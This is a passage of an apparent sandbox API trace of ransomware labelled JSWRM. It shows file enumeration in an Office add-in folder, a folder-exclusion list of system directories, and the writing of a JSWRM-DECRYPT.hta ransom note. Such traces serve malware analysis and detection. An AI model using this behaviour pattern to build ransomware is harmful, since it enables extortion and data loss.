(lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.378] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.379] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.379] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x69be349, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x69be349, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a0a7fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.379] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.379] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.379] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.379] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.379] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.379] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.379] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.379] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.379] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.379] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.379] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42d8c51, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8aaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.379] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.379] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.379] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.379] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.379] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.379] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.379] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.379] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.380] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.380] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.380] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42d8c51, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8aaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0123.380] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0123.380] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="sl", cAlternateFileName="")) returned 1 [0123.380] lstrcmpiW (lpString1="sl", lpString2=".") returned 1 [0123.380] lstrcmpiW (lpString1="sl", lpString2="..") returned 1 [0123.380] lstrcmpiW (lpString1="sl", lpString2="...") returned 1 [0123.380] lstrcmpiW (lpString1="sl", lpString2="windows") returned -1 [0123.380] lstrcmpiW (lpString1="sl", lpString2="recovery") returned 1 [0123.380] lstrcmpiW (lpString1="sl", lpString2="perflogs") returned 1 [0123.380] lstrcmpiW (lpString1="sl", lpString2="documents and settings") returned 1 [0123.380] lstrcmpiW (lpString1="sl", lpString2="$RECYCLE.BIN") returned 1 [0123.380] lstrcmpiW (lpString1="sl", lpString2="system volume information") returned -1 [0123.380] lstrcmpiW (lpString1="sl", lpString2="msocache") returned 1 [0123.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sl\\jswrm-decrypt.hta")) returned 0xffffffff [0123.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.382] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.382] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.383] CloseHandle (hObject=0x338) returned 1 [0123.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sl\\jswrm-decrypt.hta")) returned 0x20 [0123.383] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4033dfe0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0123.383] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.383] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4033dfe0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.383] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.383] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.383] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4033dfe0, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4033dfe0, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4033dfe0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.383] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.383] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.383] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.383] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.383] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.383] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.383] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.383] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.383] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.383] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.384] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5e78ac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5e78ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.384] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb8b74ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb8b74ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb8b74ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.384] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.385] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.385] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.385] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.385] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.385] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.385] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.385] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.385] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.385] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.385] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.385] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22ce70, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.385] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x633d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x86040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.385] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.385] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.385] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.385] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.385] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.385] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.385] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.385] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.385] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.385] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", 